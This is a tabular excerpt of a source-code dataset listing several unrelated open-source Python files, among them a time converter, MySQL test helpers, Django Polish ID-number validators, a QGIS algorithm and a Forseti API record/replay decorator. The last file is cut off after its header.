repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
mireianievas/enrico | script/ConvertTime.py | 2 | 2030 | #!/usr/bin/env python
import time,sys
epoch_ref = 1331679600+3600
mjd_ref = 56000.
met_ref = 353376002.000
def MJDtoJD(MJD):
return MJD+2400000.5
def JDtoMJD(JD):
return JD-2400000.5
def EpochToMeT(epoch):
# Work only on Linux Machine
depoch = epoch-epoch_ref
return depoch + met_ref+3600
def DateToMet(date):
# Work only on Linux Machine
pattern = '%Y-%m-%d %H:%M:%S'
try :
epoch = int(time.mktime(time.strptime(date, pattern)))
except:
pattern = '%Y-%m-%d'
epoch = int(time.mktime(time.strptime(date, pattern)))
return EpochToMeT(epoch)
def MetToDate(met):
# Work only on Linux Machine
epoch = met-met_ref+epoch_ref
pattern = '%Y-%m-%d %H:%M:%S'
return time.strftime(pattern,time.gmtime(epoch))
def MJDToMeT(MJD):
return (MJD-mjd_ref)*3600*24+met_ref
def MeTToMJD(met):
return (met-met_ref)/3600/24.+mjd_ref
def Print(date,mjd,met,jd):
print(("ISO date : ",date))
print(("MJD : ",mjd))
print(("JD : ",jd))
print(("MET : ",met))
def _log_():
print(("Usage: ",sys.argv[0]," Type Date"))
print("Type can be : MJD, JD, MET or ISO")
print("Data is the date to convert")
print(("exemple:\n\tpython ",sys.argv[0]," MJD 56101"))
print(("\tpython ",sys.argv[0]," ISO 2012-02-05"))
print(("\tpython ",sys.argv[0]," ISO 2012-02-05 16:15:18"))
if __name__=="__main__":
try :
Date_type = sys.argv[1]
except :
_log_()
exit()
if Date_type=="ISO":
try :
iso = sys.argv[2]+" "+sys.argv[3]
except :
iso = sys.argv[2]
Met = DateToMet(iso)
MJD = MeTToMJD(Met)
JD = MJDtoJD(MJD)
elif Date_type=="MJD":
MJD = float(sys.argv[2])
JD = MJDtoJD(MJD)
Met = MJDToMeT(MJD)
iso = MetToDate(Met)
elif Date_type=="MET":
Met = float(sys.argv[2])
MJD = MeTToMJD(Met)
JD = MJDtoJD(MJD)
iso = MetToDate(Met)
elif Date_type=="JD":
JD = float(sys.argv[2])
MJD = JDtoMJD(JD)
Met = MJDToMeT(MJD)
iso = MetToDate(Met)
else:
_log_()
exit()
Print(iso,MJD,Met,JD)
| bsd-3-clause |
metacloud/percona-xtrabackup | test/kewpie/lib/util/mysql_methods.py | 21 | 9772 | #! /usr/bin/env python
# -*- mode: python; indent-tabs-mode: nil; -*-
# vim:expandtab:shiftwidth=2:tabstop=2:smarttab:
#
# Copyright (C) 2011 Patrick Crews
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
""" mysql_methods
collection of helper methods (mysqldump, execute_query, etc)
that make working with a given server easier and repeatable
"""
import os
import difflib
import subprocess
import MySQLdb
def execute_cmd(cmd, stdout_path, exec_path=None, get_output=False):
stdout_file = open(stdout_path,'w')
cmd_subproc = subprocess.Popen( cmd
, shell=True
, cwd=exec_path
, stdout = stdout_file
, stderr = subprocess.STDOUT
)
cmd_subproc.wait()
retcode = cmd_subproc.returncode
stdout_file.close()
if get_output:
data_file = open(stdout_path,'r')
output = ''.join(data_file.readlines())
else:
output = None
return retcode, output
def get_tables(server, schema):
""" Return a list of the tables in the
schema on the server
"""
results = []
query = "SHOW TABLES IN %s" %(schema)
retcode, table_set = execute_query(query, server)
for table_data in table_set:
table_name = table_data[0]
results.append(table_name)
return results
def check_slaves_by_query( master_server
, other_servers
, query
, expected_result = None
):
""" We execute the query across all servers
and return a dict listing any diffs found,
None if all is good.
If a user provides an expected_result, we
will skip executing against the master
This is done as it is assumed the expected
result has been generated / tested against
the master
"""
comp_results = {}
if expected_result:
pass # don't bother getting it
else:
# run against master for 'good' value
retcode, expected_result = execute_query(query, master_server)
for server in other_servers:
retcode, slave_result = execute_query(query, server)
#print "%s: expected_result= %s | slave_result= %s" % ( server.name
# , expected_result
# , slave_result_
# )
if not expected_result == slave_result:
comp_data = "%s: expected_result= %s | slave_result= %s" % ( server.name
, expected_result
, slave_result
)
if comp_results.has_key(server.name):
comp_results[server.name].append(comp_data)
else:
comp_results[server.name]=[comp_data]
if comp_results:
return comp_results
return None
def check_slaves_by_checksum( master_server
, other_servers
, schemas=['test']
, tables=[]
):
""" We compare the specified tables (default = all)
from the specified schemas between the 'master'
and the other servers provided (via list)
via CHECKSUM
We return a dictionary listing the server
and any tables that differed
"""
comp_results = {}
for server in other_servers:
for schema in schemas:
for table in get_tables(master_server, schema):
query = "CHECKSUM TABLE %s.%s" %(schema, table)
retcode, master_checksum = execute_query(query, master_server)
retcode, slave_checksum = execute_query(query, server)
#print "%s: master_checksum= %s | slave_checksum= %s" % ( table
# , master_checksum
# , slave_checksum
# )
if not master_checksum == slave_checksum:
comp_data = "%s: master_checksum= %s | slave_checksum= %s" % ( table
, master_checksum
, slave_checksum
)
if comp_results.has_key(server.name):
comp_results[server.name].append(comp_data)
else:
comp_results[server.name]=[comp_data]
if comp_results:
return comp_results
return None
def take_mysqldump( server
, databases=[]
, tables=[]
, dump_path = None
, cmd_root = None):
""" Take a mysqldump snapshot of the given
server, storing the output to dump_path
"""
if not dump_path:
dump_path = os.path.join(server.vardir, 'dumpfile.dat')
if cmd_root:
dump_cmd = cmd_root
else:
dump_cmd = "%s --no-defaults --user=root --port=%d --host=127.0.0.1 --protocol=tcp --result-file=%s" % ( server.mysqldump
, server.master_port
, dump_path
)
if databases:
if len(databases) > 1:
# We have a list of db's that are to be dumped so we handle things
dump_cmd = ' '.join([dump_cmd, '--databases', ' '.join(databases)])
else:
dump_cmd = ' '.join([dump_cmd, databases[0], ' '.join(tables)])
execute_cmd(dump_cmd, os.devnull)
def diff_dumpfiles(orig_file_path, new_file_path):
""" diff two dumpfiles useful for comparing servers """
orig_file = open(orig_file_path,'r')
restored_file = open(new_file_path,'r')
orig_file_data = []
rest_file_data = []
orig_file_data= filter_data(orig_file.readlines(),'Dump completed')
rest_file_data= filter_data(restored_file.readlines(),'Dump completed')
server_diff = difflib.unified_diff( orig_file_data
, rest_file_data
, fromfile=orig_file_path
, tofile=new_file_path
)
diff_output = []
for line in server_diff:
diff_output.append(line)
output = '\n'.join(diff_output)
orig_file.close()
restored_file.close()
return (diff_output==[]), output
def filter_data(input_data, filter_text ):
return_data = []
for line in input_data:
if filter_text in line.strip():
pass
else:
return_data.append(line)
return return_data
def execute_query( query
, server
, server_host = '127.0.0.1'
, schema='test'):
try:
conn = MySQLdb.connect( host = server_host
, port = server.master_port
, user = 'root'
, db = schema)
cursor = conn.cursor()
cursor.execute(query)
result_set = cursor.fetchall()
cursor.close()
except MySQLdb.Error, e:
return 1, ("Error %d: %s" %(e.args[0], e.args[1]))
conn.commit()
conn.close()
return 0, result_set
def execute_queries( query_list
, server
, server_host= '127.0.0.1'
, schema= 'test'):
""" Execute a set of queries as a single transaction """
results = {}
retcode = 0
try:
conn = MySQLdb.connect( host = server_host
, port = server.master_port
, user = 'root'
, db = schema)
cursor = conn.cursor()
for idx, query in enumerate(query_list):
try:
cursor.execute(query)
result_set = cursor.fetchall()
except MySQLdb.Error, e:
result_set = "Error %d: %s" %(e.args[0], e.args[1])
retcode = 1
finally:
results[query+str(idx)] = result_set
conn.commit()
cursor.close()
conn.close()
except Exception, e:
retcode = 1
results = (Exception, e)
finally:
return retcode, results
| gpl-2.0 |
ric03uec/boto | boto/dynamodb/exceptions.py | 185 | 1687 | """
Exceptions that are specific to the dynamodb module.
"""
from boto.exception import BotoServerError, BotoClientError
from boto.exception import DynamoDBResponseError
class DynamoDBExpiredTokenError(BotoServerError):
"""
Raised when a DynamoDB security token expires. This is generally boto's
(or the user's) notice to renew their DynamoDB security tokens.
"""
pass
class DynamoDBKeyNotFoundError(BotoClientError):
"""
Raised when attempting to retrieve or interact with an item whose key
can't be found.
"""
pass
class DynamoDBItemError(BotoClientError):
"""
Raised when invalid parameters are passed when creating a
new Item in DynamoDB.
"""
pass
class DynamoDBNumberError(BotoClientError):
"""
Raised in the event of incompatible numeric type casting.
"""
pass
class DynamoDBConditionalCheckFailedError(DynamoDBResponseError):
"""
Raised when a ConditionalCheckFailedException response is received.
This happens when a conditional check, expressed via the expected_value
paramenter, fails.
"""
pass
class DynamoDBValidationError(DynamoDBResponseError):
"""
Raised when a ValidationException response is received. This happens
when one or more required parameter values are missing, or if the item
has exceeded the 64Kb size limit.
"""
pass
class DynamoDBThroughputExceededError(DynamoDBResponseError):
"""
Raised when the provisioned throughput has been exceeded.
Normally, when provisioned throughput is exceeded the operation
is retried. If the retries are exhausted then this exception
will be raised.
"""
pass
| mit |
hcs/mailman | src/mailman/utilities/interact.py | 3 | 3047 | # Copyright (C) 2006-2012 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""Provide an interactive prompt, mimicking the Python interpreter."""
from __future__ import unicode_literals
__metaclass__ = type
__all__ = [
'interact',
]
import os
import sys
import code
DEFAULT_BANNER = ''
def interact(upframe=True, banner=DEFAULT_BANNER, overrides=None):
"""Start an interactive interpreter prompt.
:param upframe: Whether or not to populate the interpreter's globals with
the locals from the frame that called this function.
:type upfframe: bool
:param banner: The banner to print before the interpreter starts.
:type banner: string
:param overrides: Additional interpreter globals to add.
:type overrides: dict
"""
# The interactive prompt's namespace.
namespace = dict()
# Populate the console's with the locals of the frame that called this
# function (i.e. one up from here).
if upframe:
frame = sys._getframe(1)
namespace.update(frame.f_globals)
namespace.update(frame.f_locals)
if overrides is not None:
namespace.update(overrides)
interp = code.InteractiveConsole(namespace)
# Try to import the readline module, but don't worry if it's unavailable.
try:
import readline
except ImportError:
pass
# Mimic the real interactive interpreter's loading of any $PYTHONSTARTUP
# file. Note that if the startup file is not prepared to be exec'd more
# than once, this could cause a problem.
startup = os.environ.get('PYTHONSTARTUP')
if startup:
try:
execfile(startup, namespace)
except:
pass
# We don't want the funky console object in parentheses in the banner.
if banner == DEFAULT_BANNER:
banner = '''\
Python %s on %s
Type "help", "copyright", "credits" or "license" for more information.''' % (
sys.version, sys.platform)
elif not banner:
banner = None
interp.interact(banner)
# When an exception occurs in the InteractiveConsole, the various
# sys.exc_* attributes get set so that error handling works the same way
# there as it does in the built-in interpreter. Be anal about clearing
# any exception information before we're done.
sys.exc_clear()
sys.last_type = sys.last_value = sys.last_traceback = None
| gpl-3.0 |
vipins/ccccms | env/Lib/site-packages/django/contrib/localflavor/pl/forms.py | 86 | 7601 | """
Polish-specific form helpers
"""
from __future__ import absolute_import
import re
from django.contrib.localflavor.pl.pl_administrativeunits import ADMINISTRATIVE_UNIT_CHOICES
from django.contrib.localflavor.pl.pl_voivodeships import VOIVODESHIP_CHOICES
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Select, RegexField
from django.utils.translation import ugettext_lazy as _
class PLProvinceSelect(Select):
"""
A select widget with list of Polish administrative provinces as choices.
"""
def __init__(self, attrs=None):
super(PLProvinceSelect, self).__init__(attrs, choices=VOIVODESHIP_CHOICES)
class PLCountySelect(Select):
"""
A select widget with list of Polish administrative units as choices.
"""
def __init__(self, attrs=None):
super(PLCountySelect, self).__init__(attrs, choices=ADMINISTRATIVE_UNIT_CHOICES)
class PLPESELField(RegexField):
"""
A form field that validates as Polish Identification Number (PESEL).
Checks the following rules:
* the length consist of 11 digits
* has a valid checksum
The algorithm is documented at http://en.wikipedia.org/wiki/PESEL.
"""
default_error_messages = {
'invalid': _(u'National Identification Number consists of 11 digits.'),
'checksum': _(u'Wrong checksum for the National Identification Number.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLPESELField, self).__init__(r'^\d{11}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
super(PLPESELField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
multiple_table = (1, 3, 7, 9, 1, 3, 7, 9, 1, 3, 1)
result = 0
for i in range(len(number)):
result += int(number[i]) * multiple_table[i]
return result % 10 == 0
class PLNationalIDCardNumberField(RegexField):
"""
A form field that validates as Polish National ID Card Number.
Checks the following rules:
* the length consist of 3 letter and 6 digits
* has a valid checksum
The algorithm is documented at http://en.wikipedia.org/wiki/Polish_identity_card.
"""
default_error_messages = {
'invalid': _(u'National ID Card Number consists of 3 letters and 6 digits.'),
'checksum': _(u'Wrong checksum for the National ID Card Number.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLNationalIDCardNumberField, self).__init__(r'^[A-Za-z]{3}\d{6}$',
max_length, min_length, *args, **kwargs)
def clean(self,value):
super(PLNationalIDCardNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = value.upper()
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
letter_dict = {'A': 10, 'B': 11, 'C': 12, 'D': 13,
'E': 14, 'F': 15, 'G': 16, 'H': 17,
'I': 18, 'J': 19, 'K': 20, 'L': 21,
'M': 22, 'N': 23, 'O': 24, 'P': 25,
'Q': 26, 'R': 27, 'S': 28, 'T': 29,
'U': 30, 'V': 31, 'W': 32, 'X': 33,
'Y': 34, 'Z': 35}
# convert letters to integer values
int_table = [(not c.isdigit()) and letter_dict[c] or int(c)
for c in number]
multiple_table = (7, 3, 1, -1, 7, 3, 1, 7, 3)
result = 0
for i in range(len(int_table)):
result += int_table[i] * multiple_table[i]
return result % 10 == 0
class PLNIPField(RegexField):
"""
A form field that validates as Polish Tax Number (NIP).
Valid forms are: XXX-YYY-YY-YY, XXX-YY-YY-YYY or XXXYYYYYYY.
Checksum algorithm based on documentation at
http://wipos.p.lodz.pl/zylla/ut/nip-rego.html
"""
default_error_messages = {
'invalid': _(u'Enter a tax number field (NIP) in the format XXX-XXX-XX-XX, XXX-XX-XX-XXX or XXXXXXXXXX.'),
'checksum': _(u'Wrong checksum for the Tax Number (NIP).'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLNIPField, self).__init__(r'^\d{3}-\d{3}-\d{2}-\d{2}$|^\d{3}-\d{2}-\d{2}-\d{3}$|^\d{10}$',
max_length, min_length, *args, **kwargs)
def clean(self,value):
super(PLNIPField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value = re.sub("[-]", "", value)
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
multiple_table = (6, 5, 7, 2, 3, 4, 5, 6, 7)
result = 0
for i in range(len(number)-1):
result += int(number[i]) * multiple_table[i]
result %= 11
if result == int(number[-1]):
return True
else:
return False
class PLREGONField(RegexField):
"""
A form field that validates its input is a REGON number.
Valid regon number consists of 9 or 14 digits.
See http://www.stat.gov.pl/bip/regon_ENG_HTML.htm for more information.
"""
default_error_messages = {
'invalid': _(u'National Business Register Number (REGON) consists of 9 or 14 digits.'),
'checksum': _(u'Wrong checksum for the National Business Register Number (REGON).'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLREGONField, self).__init__(r'^\d{9,14}$',
max_length, min_length, *args, **kwargs)
def clean(self,value):
super(PLREGONField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if not self.has_valid_checksum(value):
raise ValidationError(self.error_messages['checksum'])
return u'%s' % value
def has_valid_checksum(self, number):
"""
Calculates a checksum with the provided algorithm.
"""
weights = (
(8, 9, 2, 3, 4, 5, 6, 7, -1),
(2, 4, 8, 5, 0, 9, 7, 3, 6, 1, 2, 4, 8, -1),
(8, 9, 2, 3, 4, 5, 6, 7, -1, 0, 0, 0, 0, 0),
)
weights = [table for table in weights if len(table) == len(number)]
for table in weights:
checksum = sum([int(n) * w for n, w in zip(number, table)])
if checksum % 11 % 10:
return False
return bool(weights)
class PLPostalCodeField(RegexField):
"""
A form field that validates as Polish postal code.
Valid code is XX-XXX where X is digit.
"""
default_error_messages = {
'invalid': _(u'Enter a postal code in the format XX-XXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(PLPostalCodeField, self).__init__(r'^\d{2}-\d{3}$',
max_length, min_length, *args, **kwargs)
| bsd-3-clause |
supergis/QGIS | python/plugins/processing/algs/qgis/MeanCoords.py | 10 | 4806 | # -*- coding: utf-8 -*-
"""
***************************************************************************
MeanCoords.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QGis, QgsField, QgsFeature, QgsGeometry, QgsPoint
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterTableField
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class MeanCoords(GeoAlgorithm):
POINTS = 'POINTS'
WEIGHT = 'WEIGHT'
OUTPUT = 'OUTPUT'
UID = 'UID'
WEIGHT = 'WEIGHT'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Mean coordinate(s)')
self.group, self.i18n_group = self.trAlgorithm('Vector analysis tools')
self.addParameter(ParameterVector(self.POINTS,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterTableField(self.WEIGHT,
self.tr('Weight field'), MeanCoords.POINTS,
ParameterTableField.DATA_TYPE_NUMBER, optional=True))
self.addParameter(ParameterTableField(self.UID,
self.tr('Unique ID field'), MeanCoords.POINTS,
ParameterTableField.DATA_TYPE_NUMBER, optional=True))
self.addOutput(OutputVector(MeanCoords.OUTPUT, self.tr('Mean coordinates')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(self.getParameterValue(self.POINTS))
weightField = self.getParameterValue(self.WEIGHT)
uniqueField = self.getParameterValue(self.UID)
if weightField is None:
weightIndex = -1
else:
weightIndex = layer.fieldNameIndex(weightField)
if uniqueField is None:
uniqueIndex = -1
else:
uniqueIndex = layer.fieldNameIndex(uniqueField)
fieldList = [QgsField('MEAN_X', QVariant.Double, '', 24, 15),
QgsField('MEAN_Y', QVariant.Double, '', 24, 15),
QgsField('UID', QVariant.String, '', 255)]
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(
fieldList, QGis.WKBPoint, layer.crs()
)
current = 0
features = vector.features(layer)
total = 100.0 / float(len(features))
means = {}
for feat in features:
current += 1
progress.setPercentage(current * total)
if uniqueIndex == -1:
clazz = "Single class"
else:
clazz = unicode(feat.attributes()[uniqueIndex]).strip()
if weightIndex == -1:
weight = 1.00
else:
try:
weight = float(feat.attributes()[weightIndex])
except:
weight = 1.00
if clazz not in means:
means[clazz] = (0, 0, 0)
(cx, cy, totalweight) = means[clazz]
geom = QgsGeometry(feat.geometry())
geom = vector.extractPoints(geom)
for i in geom:
cx += i.x() * weight
cy += i.y() * weight
totalweight += weight
means[clazz] = (cx, cy, totalweight)
for (clazz, values) in means.iteritems():
outFeat = QgsFeature()
cx = values[0] / values[2]
cy = values[1] / values[2]
meanPoint = QgsPoint(cx, cy)
outFeat.setGeometry(QgsGeometry.fromPoint(meanPoint))
outFeat.setAttributes([cx, cy, clazz])
writer.addFeature(outFeat)
del writer
| gpl-2.0 |
jhroot/elife-bot | tests/activity/test_activity_verify_image_server.py | 2 | 3442 | import unittest
import settings_mock
from activity.activity_VerifyImageServer import activity_VerifyImageServer
import test_activity_data as test_data
from mock import patch, MagicMock
from classes_mock import FakeSession
from ddt import ddt, data
class FakeStorageContext:
def list_resources(self, resource):
return ['elife-003530-fig1-v1-1022w.jpg',
'elife-003530-fig1-v1-80w.jpg',
'elife-003530-fig1-v1-1022w.gif',
'elife-003530-fig1-v1.jpg',
'elife-003530-fig1-v1.tif',
'elife-003530-fig1-v1-download.jpg',
'elife-003530-fig1-v1-download.xml']
class TestVerifyImageServer(unittest.TestCase):
def setUp(self):
self.verifyimageserver = activity_VerifyImageServer(settings_mock, None, None, None, None)
@patch('activity.activity_VerifyImageServer.StorageContext')
@patch('activity.activity_VerifyImageServer.Session')
@patch.object(activity_VerifyImageServer,'retrieve_endpoints_check')
def test_do_activity_success(self, fake_retrieve_endpoints_check, fake_session, fake_storage_context):
# Given
data = test_data.data_example_before_publish
fake_retrieve_endpoints_check.return_value = [(True, "test.path")]
fake_session.return_value = FakeSession(test_data.session_example)
fake_storage_context.return_value = FakeStorageContext()
self.verifyimageserver.emit_monitor_event = MagicMock()
self.verifyimageserver.logger = MagicMock()
# When
result = self.verifyimageserver.do_activity(data)
# Then
self.assertEqual(result, self.verifyimageserver.ACTIVITY_SUCCESS)
@patch('activity.activity_VerifyImageServer.StorageContext')
@patch('activity.activity_VerifyImageServer.Session')
@patch.object(activity_VerifyImageServer,'retrieve_endpoints_check')
def test_do_activity_failure(self, fake_retrieve_endpoints_check, fake_session, fake_storage_context):
# Given
data = test_data.data_example_before_publish
fake_retrieve_endpoints_check.return_value = [(False, "test.path")]
fake_session.return_value = FakeSession(test_data.session_example)
fake_storage_context.return_value = FakeStorageContext()
self.verifyimageserver.emit_monitor_event = MagicMock()
self.verifyimageserver.logger = MagicMock()
# When
result = self.verifyimageserver.do_activity(data)
# Then
self.assertEqual(result, self.verifyimageserver.ACTIVITY_PERMANENT_FAILURE)
@patch('activity.activity_VerifyImageServer.StorageContext')
@patch('activity.activity_VerifyImageServer.Session')
@patch.object(activity_VerifyImageServer,'retrieve_endpoints_check')
def test_do_activity_error(self, fake_retrieve_endpoints_check, fake_session, fake_storage_context):
# Given
data = test_data.data_example_before_publish
fake_retrieve_endpoints_check.side_effect = Exception("Error!")
fake_session.return_value = FakeSession(test_data.session_example)
fake_storage_context.return_value = FakeStorageContext()
self.verifyimageserver.emit_monitor_event = MagicMock()
self.verifyimageserver.logger = MagicMock()
# When
result = self.verifyimageserver.do_activity(data)
# Then
self.assertEqual(result, self.verifyimageserver.ACTIVITY_PERMANENT_FAILURE)
| mit |
Avinash-Raj/appengine-django-skeleton | lib/django/contrib/gis/geos/prototypes/topology.py | 338 | 2145 | """
This module houses the GEOS ctypes prototype functions for the
topological operations on geometries.
"""
from ctypes import c_double, c_int
from django.contrib.gis.geos.libgeos import GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom, check_minus_one, check_string,
)
from django.contrib.gis.geos.prototypes.geom import geos_char_p
class Topology(GEOSFuncFactory):
"For GEOS unary topology functions."
argtypes = [GEOM_PTR]
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
# Topology Routines
geos_boundary = Topology('GEOSBoundary')
geos_buffer = Topology('GEOSBuffer', argtypes=[GEOM_PTR, c_double, c_int])
geos_centroid = Topology('GEOSGetCentroid')
geos_convexhull = Topology('GEOSConvexHull')
geos_difference = Topology('GEOSDifference', argtypes=[GEOM_PTR, GEOM_PTR])
geos_envelope = Topology('GEOSEnvelope')
geos_intersection = Topology('GEOSIntersection', argtypes=[GEOM_PTR, GEOM_PTR])
geos_linemerge = Topology('GEOSLineMerge')
geos_pointonsurface = Topology('GEOSPointOnSurface')
geos_preservesimplify = Topology('GEOSTopologyPreserveSimplify', argtypes=[GEOM_PTR, c_double])
geos_simplify = Topology('GEOSSimplify', argtypes=[GEOM_PTR, c_double])
geos_symdifference = Topology('GEOSSymDifference', argtypes=[GEOM_PTR, GEOM_PTR])
geos_union = Topology('GEOSUnion', argtypes=[GEOM_PTR, GEOM_PTR])
geos_cascaded_union = GEOSFuncFactory('GEOSUnionCascaded', argtypes=[GEOM_PTR], restype=GEOM_PTR)
# GEOSRelate returns a string, not a geometry.
geos_relate = GEOSFuncFactory(
'GEOSRelate', argtypes=[GEOM_PTR, GEOM_PTR], restype=geos_char_p, errcheck=check_string
)
# Linear referencing routines
geos_project = GEOSFuncFactory(
'GEOSProject', argtypes=[GEOM_PTR, GEOM_PTR], restype=c_double, errcheck=check_minus_one
)
geos_interpolate = Topology('GEOSInterpolate', argtypes=[GEOM_PTR, c_double])
geos_project_normalized = GEOSFuncFactory(
'GEOSProjectNormalized', argtypes=[GEOM_PTR, GEOM_PTR], restype=c_double, errcheck=check_minus_one
)
geos_interpolate_normalized = Topology('GEOSInterpolateNormalized', argtypes=[GEOM_PTR, c_double])
| bsd-3-clause |
forseti-security/forseti-security | google/cloud/forseti/common/util/replay.py | 1 | 6796 | # Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrapper functions used to record and replay API responses."""
from builtins import str
import collections
import functools
import os
import pickle
from googleapiclient import errors
from google.cloud.forseti.common.util import logger
LOGGER = logger.get_logger(__name__)
RECORD_ENVIRONMENT_VAR = 'FORSETI_RECORD_FILE'
REPLAY_ENVIRONMENT_VAR = 'FORSETI_REPLAY_FILE'
def _key_from_request(request):
"""Generate a unique key from a request.
Args:
request (HttpRequest): a googleapiclient HttpRequest object.
Returns:
str: A unique key from the request uri and body.
"""
return '{}{}'.format(request.uri, request.body)
def record(requests):
"""Record and serialize GCP API call answers.
Args:
requests (dict): A dictionary to store a copy of all requests and
responses in, before pickling.
Returns:
function: Decorator function.
"""
def decorate(f):
"""Decorator function for the wrapper.
Args:
f(function): passes a function into the wrapper.
Returns:
function: Wrapped function.
"""
@functools.wraps(f)
def record_wrapper(self, request, *args, **kwargs):
"""Record and serialize GCP API call answers.
Args:
self (object): Self of the caller.
request (HttpRequest): The HttpRequest object to execute.
**args (list): Additional args to pass through to function.
**kwargs (dict): Additional key word args to pass through to
function.
Returns:
object: The result from the wrapped function.
Raises:
HttpError: Raised by any fatal HTTP error when executing the
HttpRequest.
Exception: Any exception raised by the wrapped function.
"""
record_file = os.environ.get(RECORD_ENVIRONMENT_VAR, None)
if not record_file:
return f(self, request, *args, **kwargs)
with open(record_file, 'wb') as outfile:
pickler = pickle.Pickler(outfile)
request_key = _key_from_request(request)
results = requests.setdefault(
request_key, collections.deque())
try:
result = f(self, request, *args, **kwargs)
obj = {
'exception_args': None,
'raised': False,
'request': request.to_json(),
'result': result,
'uri': request.uri}
results.append(obj)
return result
except errors.HttpError as e:
# HttpError won't unpickle without all three arguments.
obj = {
'raised': True,
'request': request.to_json(),
'result': e.__class__,
'uri': request.uri,
'exception_args': (e.resp, e.content, e.uri)
}
results.append(obj)
raise
except Exception as e:
LOGGER.exception(e)
obj = {
'raised': True,
'request': request.to_json(),
'result': e.__class__,
'uri': request.uri,
'exception_args': [str(e)]
}
results.append(obj)
raise
finally:
LOGGER.debug('Recording key %s', request_key)
pickler.dump(requests)
outfile.flush()
return record_wrapper
return decorate
def replay(requests):
"""Record and serialize GCP API call answers.
Args:
requests (dict): A dictionary to store a copy of all requests and
responses in, after unpickling.
Returns:
function: Decorator function.
"""
def decorate(f):
"""Replay GCP API call answers.
Args:
f (function): Function to decorate
Returns:
function: Wrapped function.
"""
@functools.wraps(f)
def replay_wrapper(self, request, *args, **kwargs):
"""Replay and deserialize GCP API call answers.
Args:
self (object): Self of the caller.
request (HttpRequest): The HttpRequest object to execute.
**args (list): Additional args to pass through to function.
**kwargs (dict): Additional key word args to pass through to
function.
Returns:
object: The result object from the previous recording.
Raises:
Exception: Any exception raised during the previous recording.
"""
replay_file = os.environ.get(REPLAY_ENVIRONMENT_VAR, None)
if not replay_file:
return f(self, request, *args, **kwargs)
if not requests:
LOGGER.info('Loading replay file %s.', replay_file)
with open(replay_file, 'rb') as infile:
unpickler = pickle.Unpickler(infile)
requests.update(unpickler.load())
request_key = _key_from_request(request)
if request_key in requests:
results = requests[request_key]
# Pull the first result from the queue.
obj = results.popleft()
if obj['raised']:
raise obj['result'](*obj['exception_args'])
return obj['result']
else:
LOGGER.warning(
'Request URI %s with body %s not found in recorded '
'requests, executing live http request instead.',
request.uri, request.body)
return f(self, request, *args, **kwargs)
return replay_wrapper
return decorate
| apache-2.0 |
mmauroy/SickRage | lib/sqlalchemy/events.py | 75 | 35368 | # sqlalchemy/events.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
